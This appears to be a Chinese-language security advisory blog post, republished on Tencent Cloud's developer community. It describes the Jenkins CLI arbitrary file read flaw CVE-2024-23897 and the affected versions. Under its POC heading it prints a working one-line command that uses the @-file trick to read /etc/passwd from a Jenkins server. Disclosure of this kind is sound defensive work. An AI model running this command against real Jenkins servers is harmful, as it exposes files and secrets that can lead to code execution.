前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2024-23897|Jenkins任意文件读取漏洞(POC)

CVE-2024-23897|Jenkins任意文件读取漏洞(POC)

作者头像
信安百科
发布2024-02-01 15:52:15
1K0
发布2024-02-01 15:52:15
举报
文章被收录于专栏:信安百科信安百科

0x00 前言

Jenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行(这个比较抽象,暂且写上,不做解释)。

Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。

0x01 漏洞描述

Jenkins CLI 是 Jenkins 内置的命令行页面。Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容。 Jenkins处理CLI命令的命令解析器中的expandAtFile功能存在任意文件读取漏洞。 攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等在 Jenkins 控制器中执行任意代码。

0x02 CVE编号

CVE-2024-23897

0x03 影响版本

Jenkins 版本<= 2.441

Jenkins 版本<= LTS 2.426.2

0x04 漏洞详情

POC:

代码语言:javascript
复制
java -jar jenkins-cli.jar -s http://jenkins:8080/ connect-node "@/etc/passwd"

0x05 参考链接

https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314

https://blog.csdn.net/weixin_42353842/article/details/135861439?spm=1001.2014.3001.5502

本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2024-01-26,如有侵权请联系?cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
持续集成
CODING 持续集成(CODING Continuous Integration,CODING-CI)全面兼容 Jenkins 的持续集成服务,支持 Java、Python、NodeJS 等所有主流语言,并且支持 Docker 镜像的构建。图形化编排,高配集群多 Job 并行构建全面提速您的构建任务。支持主流的 Git 代码仓库,包括 CODING 代码托管、GitHub、GitLab 等。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com